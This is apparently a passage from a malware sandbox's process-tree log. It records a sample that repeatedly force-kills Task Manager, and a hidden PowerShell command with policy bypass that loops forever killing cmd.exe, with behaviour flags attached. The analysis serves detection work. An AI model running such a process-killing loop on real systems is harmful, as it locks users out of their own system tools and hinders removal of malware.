  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4088
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:4416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3920
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2328
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:740
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3212
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3920
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4340
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3940
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2488
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2868
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4552
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4072
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4064
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3280
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4856
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3916
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4516
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4136
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:3864
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:380
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3804
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3240
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3404
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4300
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3952
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2800
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4552
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2488
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4932
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3856
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3048
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4552
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:4572
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:836
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:3840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:1908
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im taskmgr.exe
      4⤵
      PID:2832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im cmd.exe}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4992
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2460
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1260
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4904
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2736
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4496
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1556
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3912
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3980
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:600
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3404
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5060
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1124
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:4048
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2328
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4272
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3880
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4584
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4088
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3112
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:4064
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4060
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3784
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:4460
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4064
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2324
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1176
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4556
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5088
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4364
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3976
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4868
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3684
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:1444
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2160
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3224
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2332
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2008
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3792
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5024
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3192
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3852
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4156
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4584
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:2456
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5032
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3912
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\taskkill.exe
